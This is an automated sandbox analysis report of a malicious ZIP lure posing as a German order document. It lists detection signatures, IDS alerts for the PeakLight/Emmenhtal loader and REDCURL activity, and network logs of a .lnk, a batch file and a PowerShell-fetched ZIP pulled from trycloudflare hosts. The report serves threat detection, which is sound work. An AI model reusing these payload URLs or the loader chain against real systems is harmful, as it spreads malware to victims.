Windows Analysis Report
https://dl.dropboxusercontent.com/scl/fi/kzw07ghqs05mfyhu8o3ey/BestellungVRG020002.zip?rlkey=27cmmjv86s5ygdnss2oa80i1o&st=86cnbbyp&dl=0

Overview

General Information

Sample URL: https://dl.dropboxusercontent.com/scl/fi/kzw07ghqs05mfyhu8o3ey/BestellungVRG020002.zip?rlkey=27cmmjv86s5ygdnss2oa80i1o&st=86cnbbyp&dl=0
Analysis ID: 1541917
Infos:

Detection

Score: 68
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Sigma detected: rundll32 run dll from internet
Suricata IDS alerts for network traffic
Downloads suspicious files via Chrome
Opens network shares
Suspicious powershell command line found
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification


Networking

Source: Network traffic Suricata IDS: 2055990 - Severity 1 - ET MALWARE PeakLight/Emmenhtal Loader Payload Request : 192.168.2.17:58432 -> 104.16.230.132:443
Source: Network traffic Suricata IDS: 2055990 - Severity 1 - ET MALWARE PeakLight/Emmenhtal Loader Payload Request : 192.168.2.17:58424 -> 104.16.230.132:443
Source: Network traffic Suricata IDS: 2030697 - Severity 1 - ET MALWARE Suspected REDCURL CnC Activity M1 : 192.168.2.17:58435 -> 104.16.230.132:443
Source: Network traffic Suricata IDS: 2055990 - Severity 1 - ET MALWARE PeakLight/Emmenhtal Loader Payload Request : 192.168.2.17:58430 -> 104.16.230.132:443
Source: Network traffic Suricata IDS: 2030697 - Severity 1 - ET MALWARE Suspected REDCURL CnC Activity M1 : 192.168.2.17:58436 -> 104.16.230.132:443
Source: global traffic TCP traffic: 192.168.2.17:58411 -> 1.1.1.1:53
Source: global traffic HTTP traffic detected: GET /ab HTTP/1.1Host: evoke-windowsservices-tas.msedge.netCache-Control: no-store, no-cacheX-PHOTOS-CALLERID: 9NMPJ99VJBWVX-EVOKE-RING: X-WINNEXT-RING: PublicX-WINNEXT-TELEMETRYLEVEL: BasicX-WINNEXT-OSVERSION: 10.0.19045.0X-WINNEXT-APPVERSION: 1.23082.131.0X-WINNEXT-PLATFORM: DesktopX-WINNEXT-CANTAILOR: FalseX-MSEDGE-CLIENTID: {c1afbad7-f7da-40f2-92f9-8846a91d69bd}X-WINNEXT-PUBDEVICEID: dbfen2nYS7HW6ON4OdOknKxxv2CCI5LJBTojzDztjwI=If-None-Match: 2056388360_-1434155563Accept-Encoding: gzip, deflate, br
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 173.223.108.114
Source: unknown TCP traffic detected without corresponding DNS query: 173.223.108.114
Source: unknown TCP traffic detected without corresponding DNS query: 173.223.108.114
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 173.223.108.114
Source: unknown TCP traffic detected without corresponding DNS query: 173.223.108.114
Source: unknown TCP traffic detected without corresponding DNS query: 173.223.108.114
Source: unknown TCP traffic detected without corresponding DNS query: 173.223.108.114
Source: unknown TCP traffic detected without corresponding DNS query: 173.223.108.114
Source: unknown TCP traffic detected without corresponding DNS query: 173.223.108.114
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknown TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknown TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: global traffic HTTP traffic detected: GET /scl/fi/kzw07ghqs05mfyhu8o3ey/BestellungVRG020002.zip?rlkey=27cmmjv86s5ygdnss2oa80i1o&st=86cnbbyp&dl=0 HTTP/1.1Host: dl.dropboxusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=+burwd2gSRS3DpE&MD=F+m3pX57 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic HTTP traffic detected: GET /ab HTTP/1.1Host: evoke-windowsservices-tas.msedge.netCache-Control: no-store, no-cacheX-PHOTOS-CALLERID: 9NMPJ99VJBWVX-EVOKE-RING: X-WINNEXT-RING: PublicX-WINNEXT-TELEMETRYLEVEL: BasicX-WINNEXT-OSVERSION: 10.0.19045.0X-WINNEXT-APPVERSION: 1.23082.131.0X-WINNEXT-PLATFORM: DesktopX-WINNEXT-CANTAILOR: FalseX-MSEDGE-CLIENTID: {c1afbad7-f7da-40f2-92f9-8846a91d69bd}X-WINNEXT-PUBDEVICEID: dbfen2nYS7HW6ON4OdOknKxxv2CCI5LJBTojzDztjwI=If-None-Match: 2056388360_-1434155563Accept-Encoding: gzip, deflate, br
Source: global traffic HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=+burwd2gSRS3DpE&MD=F+m3pX57 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /DE/bestellung-DKM00392pdf.lnk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045translate: fHost: theme-crack-emissions-perspectives.trycloudflare.com
Source: global traffic HTTP traffic detected: GET /client/config?cc=CH&setlang=en-CH HTTP/1.1X-Search-CortanaAvailableCapabilities: NoneX-Search-SafeSearch: ModerateAccept-Encoding: gzip, deflateX-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}X-UserAgeClass: UnknownX-BM-Market: CHX-BM-DateFormat: dd/MM/yyyyX-Device-OSSKU: 48X-BM-DTZ: -240X-DeviceID: 01000A41090080B6X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66EX-Search-TimeZone: Bias=300; DaylightBias=-60; TimeZoneKeyName=Eastern Standard TimeX-BM-Theme: 000000;0078d7X-Search-RPSToken: t%3DEwDoAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAAeTJB6GQoR3vFznZlEH0f2JYwWvPqjVxhhPZcNRxCuEa8rg2vF0%2B48tez2f%2B2ZaBCq2LMDmMhd2RqYDnZgQ%2BxO%2BCYYqrgaG4c9ODFtmn1shIOTEeSj6lTMoJ22RdI83MoMGqn7ZzTa5ywHlxMlUgzz2PTgBOTPK6FN1x%2Bv5aY%2BAqQlWGJQyhrvJR1ynwLYow4udbf%2Bt5XF7wdXy%2BdmAWA8AHlzXs8HZ6ZKCjmDTtNIwUvZVO1990xqukNh4hthSqVqWhtehTkACCLiRDzJvnWn/3MYPSxap3omIguycIVu3jnipHXN05qZW%2BP8aYQay9ddn2SzW6lkRXfea0OevD%2BHcQZgAAEGWEtZJPhf/IgR%2B72EZr4tiwAZOG/sn2HWBKXFYU4/oKI1Sqw9fYWGfbjkeosWd9hw%2BDC4hR/mGSyt%2B03As/9aXmz5YH6XTV0pNi30ZLy4ZFX/iIB4svD2kMWUxhDTTejlgjgnzHJacikhh42nA46f1fNg4CxR/FwhDYblDTPgAkStTho8biFQamjQOOvBRjEc1W0Gnh26rtIw2CwB3ErC0PwcshYCjpXxo/zwTAeJOFdpcjXUDVHe27g%2B71OkuzyGEG7NkTQhTSKy3zei5TSOQVZzbvAc2eXPbOBNFnqD0CeVP4Te2GEQrYq%2BUeWd/vW2xGbe90GiSV9N975/wF/o%2BhdMieHOegaLIw5mxhMVZJw6mXgAgytNOb39FhQu5ll6ZmFkne95amvgOTcr5AXKPLCIezgzqRipCHoD74VNfoyB4JPq/38Uhwgh2c4tMoXrF%2B8bijhGem%2BLq7QK9PSOkeTybpWOwYm2WKmqdjLUaNHD5LY3oCjVTsJT23SQ/SIeb8aJc6s9ZOUtL2uclqBs/dMYMA0Zlkz2xp1Qfcw01Hi1qGtrHubkawh59S1lXd3m7gxdmTnee0ZFBGL41cySdnFNoB%26p%3DX-Agent-DeviceId: 01000A41090080B6X-BM-CBT: 1729844189User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045X-Device-isOptin: falseAccept-language: en-GB, en, en-USX-Device-Touch: falseX-Device-ClientSession: 22FB18B5D25C449CA38B28C3BD9A9077X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIHost: www.bing.comConnection: Keep-AliveCookie: SRCHUID=V=2&GUID=C4EAB6C130004333A34B5668AE4E4D10&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=en; MUID=4590362BB5CF472B95BBEDB3112D4B7B; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
Source: global traffic HTTP traffic detected: GET /tue.bat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045translate: fHost: theme-crack-emissions-perspectives.trycloudflare.com
Source: global traffic HTTP traffic detected: GET /toto.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: retailer-indicators-resume-key.trycloudflare.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /onboarding/smskillreader.txt HTTP/1.1Host: armmf.adobe.comConnection: keep-aliveAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brIf-None-Match: "78-5faa31cce96da"If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
Source: global traffic DNS traffic detected: DNS query: dl.dropboxusercontent.com
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: retailer-indicators-resume-key.trycloudflare.com
Source: global traffic DNS traffic detected: DNS query: x1.i.lencr.org
Source: unknown HTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 3592Host: login.live.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 25 Oct 2024 08:16:35 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeCF-Ray: 8d80c3ed2f474677-DFWCF-Cache-Status: DYNAMICServer: cloudflare
Source: 77EC63BDA74BD0D0E0426DC8F80085060.34.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: powershell.exe, 00000024.00000002.2402487121.0000013E46D58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2402487121.0000013E46C18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000024.00000002.2355149096.0000013E36DC1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000024.00000002.2355149096.0000013E38180000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://retailer-indicators-resume-key.trycloudflare.com
Source: powershell.exe, 00000024.00000002.2355149096.0000013E36BA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000024.00000002.2355149096.0000013E36DC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2406744856.0000013E4EBF2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: 2D85F72862B55C4EADD9E66E06947F3D0.34.dr String found in binary or memory: http://x1.i.lencr.org/
Source: powershell.exe, 00000024.00000002.2355149096.0000013E36BA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000024.00000002.2402487121.0000013E46C18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000024.00000002.2402487121.0000013E46C18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000024.00000002.2402487121.0000013E46C18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000024.00000002.2355149096.0000013E36DC1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000024.00000002.2355149096.0000013E37D05000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000024.00000002.2402487121.0000013E46D58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2402487121.0000013E46C18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000024.00000002.2355149096.0000013E37EEE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://retailer-indicators-resume-key.trycloudfla
Source: powershell.exe, 00000024.00000002.2355149096.0000013E37EEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2355149096.0000013E36DC1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://retailer-indicators-resume-key.trycloudflare.com
Source: powershell.exe, 00000024.00000002.2351437707.0000013E34B70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://retailer-indicators-resume-key.trycloudflare.com/toto.zip
Source: cmd.exe, 0000001E.00000003.2317191329.0000025D62B69000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://retailer-indicators-resume-key.trycloudflare.com/toto.zip&
Source: powershell.exe, 00000024.00000002.2352815037.0000013E34C50000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://retailer-indicators-resume-key.trycloudflare.com/toto.zip;
Source: cmd.exe, 0000001E.00000003.2317191329.0000025D62B49000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000003.2318311250.0000025D62B4F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.2350815549.0000025D62B4D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://retailer-indicators-resume-key.trycloudflare.com/toto.zipO
Source: cmd.exe, 0000001E.00000003.2317191329.0000025D62B69000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://retailer-indicators-resume-key.trycloudflare.com/toto.zipWindows##
Source: powershell.exe, 00000024.00000002.2352815037.0000013E34C50000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://retailer-indicators-resume-key.trycloudflare.com/toto.zipX
Source: cmd.exe, 0000001E.00000003.2317191329.0000025D62B69000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://retailer-indicators-resume-key.trycloudflare.com/toto.zipxit
Source: rundll32.exe, 00000016.00000002.1565812654.0000020B53770000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000018.00000002.1742704031.0000028904A5B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001F.00000002.1961788980.000002068657C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001F.00000002.1961788980.0000020686586000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://theme-crack-emissions-perspectives.trycloudflare.com/
Source: rundll32.exe, 00000016.00000002.1565812654.0000020B537CB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://theme-crack-emissions-perspectives.trycloudflare.com/#
Source: rundll32.exe, 0000001F.00000002.1961788980.0000020686586000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://theme-crack-emissions-perspectives.trycloudflare.com/55theme-crack-emissions-perspectives.tr
Source: rundll32.exe, 00000011.00000002.1551843850.000001EC8FB50000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000016.00000002.1565812654.0000020B53770000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://theme-crack-emissions-perspectives.trycloudflare.com/C:
Source: rundll32.exe, 00000018.00000002.1742704031.00000289049E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://theme-crack-emissions-perspectives.trycloudflare.com/DE/bestellung-DKM00392pdf.lnk
Source: rundll32.exe, 00000018.00000002.1742704031.00000289049E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://theme-crack-emissions-perspectives.trycloudflare.com/DE/bestellung-DKM00392pdf.lnk:
Source: rundll32.exe, 00000018.00000002.1742704031.00000289049E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://theme-crack-emissions-perspectives.trycloudflare.com/DE/bestellung-DKM00392pdf.lnkC:
Source: rundll32.exe, 00000018.00000002.1742704031.0000028904A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://theme-crack-emissions-perspectives.trycloudflare.com/DE/bestellung-DKM00392pdf.lnkL
Source: rundll32.exe, 00000018.00000002.1742704031.00000289049E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://theme-crack-emissions-perspectives.trycloudflare.com/DE/bestellung-DKM00392pdf.lnkq
Source: rundll32.exe, 00000018.00000002.1742704031.00000289049E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://theme-crack-emissions-perspectives.trycloudflare.com/DE/bestellung-DKM00392pdf.lnkrw
Source: rundll32.exe, 00000018.00000002.1742917977.0000028904C60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://theme-crack-emissions-perspectives.trycloudflare.com/DE/bestellung-DKM00392pdf.lnks=C:
Source: rundll32.exe, 00000011.00000002.1552005067.000001EC8FF00000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://theme-crack-emissions-perspectives.trycloudflare.com/ESSOR_REVISION
Source: rundll32.exe, 00000016.00000002.1566077343.0000020B53A00000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://theme-crack-emissions-perspectives.trycloudflare.com/ESSOR_REVISIONJ
Source: rundll32.exe, 00000016.00000002.1565812654.0000020B53778000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://theme-crack-emissions-perspectives.trycloudflare.com/OT
Source: rundll32.exe, 00000011.00000002.1551843850.000001EC8FB58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://theme-crack-emissions-perspectives.trycloudflare.com/ll
Source: rundll32.exe, 0000001F.00000002.1961788980.0000020686520000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://theme-crack-emissions-perspectives.trycloudflare.com/tue.bat
Source: rundll32.exe, 0000001F.00000002.1961788980.0000020686528000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://theme-crack-emissions-perspectives.trycloudflare.com/tue.bat4
Source: rundll32.exe, 0000001F.00000002.1961788980.0000020686520000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://theme-crack-emissions-perspectives.trycloudflare.com/tue.batC:
Source: rundll32.exe, 0000001F.00000002.1962100847.0000020686810000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://theme-crack-emissions-perspectives.trycloudflare.com/tue.batq
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown Network traffic detected: HTTP traffic on port 58436 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58413 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49676 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58418
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58417
Source: unknown Network traffic detected: HTTP traffic on port 49691 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58419
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58414
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58413
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58416
Source: unknown Network traffic detected: HTTP traffic on port 58423 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58415
Source: unknown Network traffic detected: HTTP traffic on port 58426 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58442 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58421
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58420
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58423
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58422
Source: unknown Network traffic detected: HTTP traffic on port 58439 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58416 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58433 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58412 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49691
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58428
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58425
Source: unknown Network traffic detected: HTTP traffic on port 58422 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58424
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58427
Source: unknown Network traffic detected: HTTP traffic on port 58425 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58426
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58432
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58431
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58434
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58433
Source: unknown Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58430
Source: unknown Network traffic detected: HTTP traffic on port 58415 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58419 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58432 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58439
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58436
Source: unknown Network traffic detected: HTTP traffic on port 58421 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58435
Source: unknown Network traffic detected: HTTP traffic on port 58428 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58437
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58442
Source: unknown Network traffic detected: HTTP traffic on port 58418 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58431 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49680 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58414 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58435 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown Network traffic detected: HTTP traffic on port 58437 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49677 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58420 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58427 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58448
Source: unknown Network traffic detected: HTTP traffic on port 58424 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58448 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58412
Source: unknown Network traffic detected: HTTP traffic on port 58430 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown Network traffic detected: HTTP traffic on port 58417 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58434 -> 443
Source: unknown HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.17:49703 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 173.223.108.114:443 -> 192.168.2.17:58412 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.17:58413 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.17:58414 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.17:58415 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.31.73:443 -> 192.168.2.17:58416 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:58418 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.17:58419 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.31.73:443 -> 192.168.2.17:58421 version: TLS 1.2
